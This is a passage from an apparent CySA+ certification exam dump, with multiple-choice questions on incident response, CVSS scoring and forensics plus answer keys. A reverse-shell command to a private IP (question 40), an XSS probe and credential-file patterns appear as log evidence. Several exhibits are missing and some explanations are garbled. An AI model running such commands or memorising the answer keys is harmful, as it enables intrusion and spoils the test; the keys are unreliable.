them completely. It may also create conflicts or performance issues with other security tools or systems on
the device. Configuring the system to use a proxy server for Internet access may help to filter or monitor
some types of malicious traffic or requests, but it may not prevent or remove malware that has already
infected the device or that uses other methods of communication or propagation. Deleting the user profile
and restoring data from backup may help to recover some data or settings that may have been affected by
the malware, but it may not remove malware that has infected other parts of the system or that has
persisted on the device.

QUESTION 7
A cloud team received an alert that unauthorized resources were being auto-provisioned. After
investigating, the team suspects that cryptomining is occurring. Which of the following indicators would
most likely lead the team to this conclusion?

A. High GPU utilization

B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes

Correct Answer: A
Explanation

Explanation/Reference:
Cryptomining, especially when performed on cloud resources without authorization, is a resource-intensive
activity

QUESTION 8
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of
resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security
team, which of the following groups should the issue be escalated to first in order to comply with industry
best practices?

A. Help desk
B. Law enforcement
C. Legal department
D. Board member

Correct Answer: C
Explanation

Explanation/Reference:
When updating a reporting policy that pertains to inappropriate use of resources, it's important to involve
the legal department as one of the first steps. Inappropriate use of resources can have legal implications,
and involving the legal department ensures that the policy aligns with legal regulations and requirements.
They can provide guidance on the appropriate actions to take and help ensure that the policy is
comprehensive and legally sound.
QUESTION 9
Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.

B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

Correct Answer: B
Explanation

Explanation/Reference:
AV:N: vulnerability is network-based
AC:L: attack complexity is low
PR:N: privileges are not required to exploit the vulnerability
UI:N: no user interaction required
S:U: scope of the impact is unchanged (unchanged scope).
C:H: confidentiality impact is high.
I:H: integrity impact is high.
A:H: availability impact is high.

The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be
inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a
framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and
severity. The CVSS string consists of several metrics that define different aspects of the vulnerability, such
as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the
impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector
(AV), which indicates how the vulnerability can be exploited. The value of AV in this case is N, which
stands for network. This means that the vulnerability can be exploited remotely over a network connection,
without physical or logical access to the target system. Therefore, the vulnerability is network based.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://packitforwarding.com/index.php/2019/01/10/comptia-cysa-common-vulnerability-scoring-system

QUESTION 10
A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of
its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the
system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A. 1
B. 2
C. 3
D. 4

Correct Answer: D
Explanation

Explanation/Reference:
Since the company is concerned with ensuring the accuracy of the data, the analyst must prioritize integrity
over other data. Analyzing the values in the table, options A, B, C would be discarded as having an L or N
impact

QUESTION 11
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information
about the systems and vulnerabilities is shown in the tables below:

Which of the following should the security analyst prioritize for remediation?

A. rogers
B. brady
C. brees
D. manning

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 12
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the
following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.

B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 13
Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly

B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan

Correct Answer: A
Explanation

Explanation/Reference:
A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and
how to react properly, without actually performing any actions or using any resources. A tabletop exercise
is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a
cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles,
responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential
impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident
response plan, improve communication and coordination among the stakeholders, raise awareness and
preparedness for potential incidents, and provide feedback and recommendations for improvement.

QUESTION 14
A virtual web server in a server pool was infected with malware after an analyst used the internet to
research a system issue. After the server was rebuilt and added back into the server pool, users reported
issues with the website, indicating the site could not be trusted. Which of the following is the most likely
cause of the server issue?

A. The server was configured to use SSL to securely transmit data.

B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.

Correct Answer: D
Explanation

Explanation/Reference:
A digital certificate is a document that contains the public key and identity information of a web server, and
is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the
web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies
the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA,
but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be
trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the
website, indicating that the site could not be trusted or that the connection is not secure.

https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.techtarget.com/searchsecurity/quiz/Sample-CompTIA-CySA-test-questions-with-answers

QUESTION 15
A zero-day command injection vulnerability was published. A security administrator is analyzing the
following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 16
A security analyst needs to ensure that systems across the organization are protected based on the
sensitivity of the content each system hosts. The analyst is working with the respective system owners to
help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the
data being hosted. Which of the following should the security analyst perform first to categorize and
prioritize the respective systems?

A. Interview the users who access these systems.

B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

Correct Answer: D
Explanation

Explanation/Reference:
Determining the asset value of each system is the best action to perform first, as it helps to categorize and
prioritize the systems based on the sensitivity of the data they host. The asset value is a measure of how
important a system is to the organization, in terms of its financial, operational, or reputational impact. The
asset value can help the security analyst to assign a risk level and a protection level to each system, and
to allocate resources accordingly. The other actions are not as effective as determining the asset value, as
they do not directly address the goal of promoting confidentiality, availability, and integrity of the data.
Interviewing the users who access these systems may provide some insight into how the systems are
used and what data they contain, but it may not reflect the actual value or sensitivity of the data from an
organizational perspective. Scanning the systems to see which vulnerabilities currently exist may help to
identify and remediate some security issues, but it does not help to categorize or prioritize the systems
based on their data sensitivity. Configuring alerts for vendor-specific zero-day exploits may help to detect
and respond to some emerging threats, but it does not help to protect the systems based on their data
sensitivity.

QUESTION 17
A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.

B. A network drive was added to allow exfiltration of data.
C. A new program has been set to execute on system start.
D. The host firewall on 192.168.1.10 was disabled.

Correct Answer: C
Explanation

Explanation/Reference:
A new program has been set to execute on system start is the most likely cause of the suspicious activity
that is occurring, as it indicates that the malware has modified the registry keys of the system to ensure its
persistence. File Integrity Monitoring (FIM) is a tool that monitors changes to files and registry keys on a
system and alerts the security analyst of any unauthorized or malicious modifications.
The alert triggered by FIM shows that the malware has created a new registry key under the Run subkey,
which is used to launch programs automatically when the system starts. The new registry key points to a
file named “update.exe” in the Temp folder, which is likely a malicious executable disguised as a legitimate
update file.

https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/training/books/cysa-cs0-002-study-guide

QUESTION 18
Which of the following best describes the document that defines the expectation to network customers that
patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA
B. LOI
C. MOU
D. KPI

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 19
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an
internal host to a blocklisted external server. Which of the following best describes the activity that is taking
place?

A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing

Correct Answer: D
Explanation

Explanation/Reference:
Beaconing is the best term to describe the activity that is taking place, as it refers to the periodic
communication between an infected host and a blocklisted external server. Beaconing is a common
technique used by malware to establish a connection with a command-and-control (C2) server, which can
provide instructions, updates, or exfiltration capabilities to the malware. Beaconing can vary in frequency,
duration, and payload, depending on the type and sophistication of the malware. The other terms are not
as accurate as beaconing, as they describe different aspects of malicious activity. Data exfiltration is the
unauthorized transfer of data from a compromised system to an external destination, such as a C2 server
or a cloud storage service. Data exfiltration can be a goal or a consequence of malware infection, but it
does not necessarily involve blocklisted servers or consistent requests. Rogue device is a device that is
connected to a network without authorization or proper security controls. Rogue devices can pose a
security risk, as they can introduce malware, bypass firewalls, or access
sensitive data. However, rogue devices are not necessarily infected with malware or communicating with
blocklisted servers. Scanning is the process of probing a network or a system for vulnerabilities, open
ports, services, or other information. Scanning can be performed by legitimate administrators or malicious
actors, depending on the intent and authorization. Scanning does not imply consistent requests or
blocklisted servers, as it can target any network or system.

QUESTION 20
An incident response team is working with law enforcement to investigate an active web server
compromise. The decision has been made to keep the server running and to implement compensating
controls for a period of time. The web service must be accessible from the internet via the reverse proxy
and must connect to a database server. Which of the following compensating controls will help contain the
adversary while meeting the other requirements? (Choose two).

A. Drop the tables on the database server to prevent data exfiltration.

B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.

Correct Answer: BD
Explanation

Explanation/Reference:

QUESTION 21
An incident response team member is triaging a Linux server. The output is shown below:
Which of the following is the adversary most likely trying to do?

A. Create a backdoor root account named zsh.

B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 22
A SOC analyst identifies the following content while examining the output of a debugger command over a
client-server application:

getConnection(database01,"alpha" ,"AxTv.127GdCx94GTd");

Which of the following is the most likely vulnerability in this system?

A. Lack of input validation

B. SQL injection
C. Hard-coded credential
D. Buffer overflow
Correct Answer: C
Explanation

Explanation/Reference:
The most likely vulnerability in this system is hard-coded credential. Hard-coded credential is a practice of
embedding or storing a username, password, or other sensitive information in the source code or
configuration file of a system or application. Hard-coded credential can pose a serious security risk, as it
can expose the system or application to unauthorized access, data theft, or compromise if the credential is
discovered or leaked by an attacker. Hard-coded credential can also make it difficult to change or update
the credential if needed, as it may require modifying the code or file and redeploying the system or
application.

QUESTION 23
A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A. The host is not up or responding.

B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 24
A managed security service provider is having difficulty retaining talent due to an increasing workload
caused by a client doubling the number of devices connected to the network. Which of the following would
best aid in decreasing the workload without increasing staff?

A. SIEM
B. XDR
C. SOAR
D. EDR

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 25
An employee is suspected of misusing a company-issued laptop. The employee has been suspended
pending an investigation by human resources. Which of the following is the best step to preserve
evidence?

A. Disable the user’s network account and access to web resources.

B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.

Correct Answer: D
Explanation

Explanation/Reference:
Making a forensic image of the device and creating a SRA-1 hash is the best step to preserve evidence, as
it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of
the device’s storage media, which preserves all the information on the device, including deleted or hidden
files. A SRA-I hash is a cryptographic value that is calculated from the forensic image, which can be used
to prove that the image has not been altered or tampered with. The other options are not as effective as
making a forensic image and creating a SRA-1 hash, as they may not capture all the relevant data, or they
may not provide sufficient verification of the evidence’s authenticity.

https://www.sans.org/blog/forensics-101-acquiring-an-image-with-ftk-imager/
https://swailescomputerforensics.com/digital-forensics-imaging-hash-value/

QUESTION 26
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited
time and resources. Which of the following best describes the threat actor attributed to the malicious
activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 27
A systems analyst is limiting user access to system configuration keys and values in a Windows
environment. Which of the following describes where the analyst can find these configuration items?

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry

Correct Answer: D
Explanation

Explanation/Reference:
The registry is a database that stores system configuration keys and values in a Windows environment.
The registry contains information about the hardware, software, users, and preferences of the system. The
registry can be accessed and modified using the Registry Editor tool (regedit.exe) or the command-line tool
(reg.exe). The registry is organized into five main sections, called hives, which are further divided into
subkeys and values.
The other options are not the best descriptions of where the analyst can find system configuration keys
and values in a Windows environment. config.ini (A) is a file that stores configuration settings for some
applications, but it is not a database that stores system configuration keys and values. ntds.dit (B) is a file
that stores the Active Directory data for a domain controller, but it is not a database that stores system
configuration keys and values. Master boot record © is a section of the hard disk that contains information
about the partitions and the boot loader, but it is not a database that stores system configuration keys and
values.

QUESTION 28
While reviewing web server logs, a security analyst found the following line:

<IMG SRC='vbscript:msgbox("test")'>

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

Correct Answer: D
Explanation

Explanation/Reference:
XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute
malicious scripts or commands on the client-side. XSS attackers inject malicious code, such as JavaScript,
VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code
can then access or manipulate the user’s session, cookies, browser history, or personal information, or
perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or
installing malware

The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to
insert an <IMG> tag with a malicious SRC attribute that contains a VBScript code. The VBScript code is
intended to display a message box with the text “test” when the user views the web page or application.
This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web
server or browser, or to launch more sophisticated and harmful attacks

QUESTION 29
A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that
resolves to

A. This is a normal password change URL.

B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 30
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner
appliance, configures the subnets to scan, and begins the scan of the network. Which of the following
would be missing from a scan performed with this configuration?

A. Operating system version

B. Registry key values
C. Open ports
D. IP address

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 31
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the
underlying host. Which of the following patterns can the security analyst use to search the web server logs
for evidence of exploitation of that particular vulnerability?

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/

Correct Answer: A
Explanation

Explanation/Reference:
/etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of
exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI
stands for Local File Inclusion, which is a ulnerability that allows an attacker to include local files on the
web server into the output of a web application. LFI can be exploited to extract sensitive information from
the web server, such as configuration files, passwords, or source code. The /etc/shadow file is a file that
stores the encrypted passwords of all users on a Linux system. If an attacker can exploit the LFI
vulnerability to include this file into the web application output, they can obtain the credentials of the users
on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web
server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

QUESTION 32
A company is in the process of implementing a vulnerability management program. Which of the following
scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to
the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

Correct Answer: B
Explanation

Explanation/Reference:
Passive scanning involves monitoring network traffic to identify vulnerabilities without actively probing or
interacting with the devices. This method is relatively non-intrusive and can provide valuable information
without directly affecting the systems.
However, it's important to note that passive scanning might not identify all vulnerabilities, so a combination
of passive scanning and periodic credentialed scanning might be a balanced approach to ensure accurate
vulnerability assessment while minimizing disruption.

QUESTION 33
A company receives a penetration test report summary from a third party. The report summary indicates a
proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the
company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of
the following best practices should the company follow with this proxy?

A. Leave the proxy as is.

B. Decomission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.

Correct Answer: B
Explanation

Explanation/Reference:
Since the proxy is not in use and has a critical vulnerability with a high CVSS score, the best course of
action is to decommission the proxy.
Patching the proxy might be an option if it were actively being used and could not be replaced, but since a
new proxy is already in place, decommissioning is the most appropriate action.

QUESTION 34
An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of
the following is most likely the issue with the system?

A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook

Correct Answer: C
Explanation

Explanation/Reference:
When examining events in multiple systems and having difficulty correlating data points, the most likely
issue could be a lack of proper time synchronization across the systems. Time synchronization is crucial
for accurate event correlation and forensic analysis, as it ensures that events are properly aligned in
chronological order.

QUESTION 35
An analyst recommends that an EDR agent collect the source IP address, make a connection to the
firewall, and create a policy to block the malicious source IP address across the entire network
automatically. Which of the following is the best option to help the analyst implement this
recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

Correct Answer: A
Explanation

Explanation/Reference:
SOAR (Security Orchestration, Automation, and Response) is the best option to help the analyst
implement the recommendation, as it reflects the software solution that enables security teams to integrate
and coordinate separate tools into streamlined threat response workflows and automate repetitive tasks.
SOAR is a term coined by Gartner in 2015 to describe a technology that combines the functions of security
incident response platforms, security orchestration and automation platforms, and threat intelligence
platforms in one offering. SOAR solutions help security teams to collect inputs from various sources, such
as EDR agents, firewalls, or SIEM systems, and perform analysis and triage using a combination of human
and machine power. SOAR solutions also allow security teams to define and execute incident response
procedures in a digital workflow format, using automation to perform low-level tasks or actions, such as
blocking an IP address or quarantining a device. SOAR solutions can help security teams to improve
efficiency, consistency, and scalability of their operations, as well as reduce
mean time to detect (MTTD) and mean time to respond (MTTR) to threats. The other options are not as
suitable as SOAR, as they do not match the description or purpose of the recommendation. SIEM (Security
Information and Event Management) is a software solution that collects and analyzes data from various
sources, such as logs, events, or alerts, and provides security monitoring, threat detection, and incident
response capabilities. SIEM solutions can help security teams to gain visibility, correlation, and context of
their security data, but they do not provide automation or orchestration features like SOAR solutions. SLA
(Service Level Agreement) is a document that defines the expectations and responsibilities between a
service provider and a customer, such as the quality, availability, or performance of the service. SLAs can
help to manage customer expectations, formalize communication, and improve productivity and
relationships, but they do not help to implement technical recommendations like SOAR solutions. IoC
(Indicator of Compromise) is a piece of data or evidence that suggests a system or network has been
compromised by a threat actor, such as an IP address, a file hash, or a registry key. IoCs can help to
identify and analyze malicious activities or incidents, but they do not help to implement response actions
like SOAR solutions.

QUESTION 36
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some
machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date.
Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.

B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.

Correct Answer: A
Explanation

Explanation/Reference:
As the OS that controls the business-critical machinery is approaching its end-of-life date, it means that the
OS will no longer receive updates and security patches from the vendor. This leaves the OS and the
machinery susceptible to potential security breaches and attacks that could exploit these unpatched
vulnerabilities.

QUESTION 37
Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.

Correct Answer: D
Explanation

Explanation/Reference:
The root cause analysis identifies the contributing items that facilitated the event is the best reason for
conducting a root cause analysis, as it reflects the main goal and benefit of this problem-solving approach.
A root cause analysis (RCA) is a process of discovering the root causes of problems in order to identify
appropriate solutions. A root cause is the core issue or factor that sets in motion the entire cause-and-
effect chain that leads to the problem. A root cause analysis assumes that it is more effective to
systematically prevent and solve underlying issues rather than just treating symptoms or putting out fires. A
root cause analysis can be performed using various methods, tools, and techniques that help to uncover
the causes of problems, such as events and causal factor analysis, change analysis, barrier analysis, or
fishbone diagrams. A root cause analysis can help to improve quality, performance, safety, or efficiency by
finding and eliminating the sources of problems. The other options are not as accurate as the root cause
analysis identifies the contributing items that facilitated the event, as they do not capture the essence or
value of conducting a root cause analysis. The root cause analysis ensures that proper timelines were
documented is a possible outcome or benefit of conducting a root cause analysis, but it is not the best
reason for doing so. Documenting timelines can help to establish the sequence of events and actions that
led to the problem, but it does not necessarily identify or address the root causes. The root cause analysis
allows the incident to be properly documented for reporting is also a possible outcome or benefit of
conducting a root cause analysis, but it is not the best reason for doing so. Documenting and reporting
incidents can help to communicate and share information about problems and solutions, but it does not
necessarily identify or address the root causes. The root cause analysis develops recommendations to
improve the process is another possible outcome or benefit of conducting a root cause analysis, but it is
not the best
reason for doing so. Developing recommendations can help to implement solutions and prevent future
problems, but it does not necessarily identify or address the root causes.

QUESTION 38
Which of the following concepts is using an API to insert bulk access requests from a file into an identity
management system an example of?

A. Command and control

B. Data enrichment
C. Automation
D. Single sign-on

Correct Answer: C
Explanation

Explanation/Reference:
Using an API to insert bulk access requests from a file into an identity management system is an example
of automation. Automation involves using technology, like APIs, scripts, or tools, to perform tasks and
processes automatically without manual intervention.

QUESTION 39
A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against
external threats regardless of the device’s operating system. Which of the following best meets this
requirement?

A. SIEM
B. CASB
C. SOAR
D. EDR

Correct Answer: D
Explanation
Explanation/Reference:
EDR stands for Endpoint Detection and Response, which is a layer of defense that monitors endpoints for
malicious activity and provides automated or manual response capabilities. EDR can protect against
external threats regardless of the device’s operating system, as it can detect and respond to attacks based
on behavioral analysis and threat intelligence. EDR is also one of the tools that CompTIA CySA+ covers in
its exam objective

https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://resources.infosecinstitute.com/certification/cysa-plus-ia-levels/

QUESTION 40
A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is
ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo
"OK"
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo
"OK"

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 41
A company is concerned with finding sensitive file storage locations that are open to the public. The current
internal cloud network is flat. Which of the following is the best solution to secure the network?

A. Implement segmentation with ACLs.

B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 42
A security analyst is reviewing the findings of the latest vulnerability report for a company’s web
application. The web application accepts files for a Bash script to be processed if the files match a given
hash. The analyst is able to submit files to the system due to a hash collision. Which of the following
should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and
infrastructure?

A. Deploy a WAF to the front of the application.

B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

Correct Answer: B
Explanation

Explanation/Reference:
This option involves changing the hash algorithm from the vulnerable MD5 to the more secure SHA-256. It
addresses the hash collision vulnerability directly and doesn't require major changes to the existing
infrastructure or script logic.

QUESTION 43
A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that
embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

Correct Answer: C
Explanation

Explanation/Reference:
When dealing with a known and exploited vulnerability related to an attack vector that involves embedding
software through the USB interface, the primary concern is to immediately stop the active exploitation and
prevent further attacks. Given the options provided, the answeer is the best

Check configurations for USB ports (Option C): This is the most immediate action to take. Disabling or
securing USB ports on company assets will prevent the attacker from further exploiting the vulnerability
through this attack vector. It's a quick and effective way to mitigate ongoing attacks.

QUESTION 44
A systems administrator receives reports of an internet-accessible Linux server that is running very
sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects
a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would
best help to prove whether this server was experiencing this behavior?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

Correct Answer: B
Explanation

Explanation/Reference:
In this scenario, where the administrator suspects a DoS attack related to half-open TCP sessions
consuming memory, TCPDump would be the best tool to use. It can help prove whether the server is
experiencing this behavior by capturing and analyzing the network packets to identify patterns consistent
with half-open TCP sessions.

QUESTION 45
A security analyst is validating a particular finding that was reported in a web application vulnerability scan
to make sure it is not a false positive. The security analyst uses the snippet below:
Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

Correct Answer: C
Explanation

Explanation/Reference:
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to
interfere with an application's processing of XML data. It often allows an attacker to view files on the
application server filesystem, and to interact with any back-end or external systems that the application
itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other
back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF)
attacks.

References:
https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/xxe/xml-entities
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

QUESTION 46
Which of the following is the most important factor to ensure accurate incident response reporting?

A. A well-defined timeline of the events

B. A guideline for regulatory reporting
C. Logs from the impacted system
D. A well-developed executive summary

Correct Answer: A
Explanation

Explanation/Reference:
Although all of the options presented are important factors in ensuring accurate incident response
reporting, but option A, is generally considered the most important factor. Having a detailed timeline of
events allows incident responders to understand the sequence of actions, the duration of the incident, and
the relationships between different actions. This helps in identifying the root cause of the incident,
understanding its scope, and crafting an effective response strategy.

QUESTION 47
A security analyst is trying to detect connections to a suspicious IP address by collecting the packet
captures from the gateway. Which of the following commands should the security analyst consider
running?

A. grep [IP address] packets.pcap

B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]

Correct Answer: C
Explanation

Explanation/Reference:
The -n flag ensures that numeric IP addresses are not resolved to hostnames, and the -r flag specifies the
input pcap file. The host [IP address] expression filters packets that involve the specified IP address,
helping the security analyst detect connections to the suspicious IP address.

QUESTION 48
A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar
CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst
remediate first?

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Correct Answer: C
Explanation

Explanation/Reference:
Reference: https://www.first.org/cvss/specification-document

QUESTION 49
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should
be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email

Correct Answer: BF
Explanation

Explanation/Reference:
Review the headers from the forwarded email: Examining the email headers can provide crucial
information about the email's source, path, and any intermediaries it went through. This information can
help identify signs of spoofing or suspicious behavior.

Examine the SPF, DKIM, and DMARC fields from the original email: These three mechanisms (Sender
Policy Framework - SPF, DomainKeys Identified Mail - DKIM, and Domain-based Message Authentication,
Reporting, and Conformance - DMARC) are used to authenticate the sender's domain and reduce the
likelihood of email spoofing. Checking these fields can provide insights into the authenticity of the email.

QUESTION 50
A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of
the exploits on the business. Given the constraints of the current sprint, only three can be remediated.
Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0

B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5
Correct Answer: A
Explanation

Explanation/Reference:
In the given options, the least impactful risk can be determined by looking at the CVSS Base Scores. The
lower the base score, the less impactful the vulnerability. Among the given options, option A has the lowest
base score of 6.0.

QUESTION 51
A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require
patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the
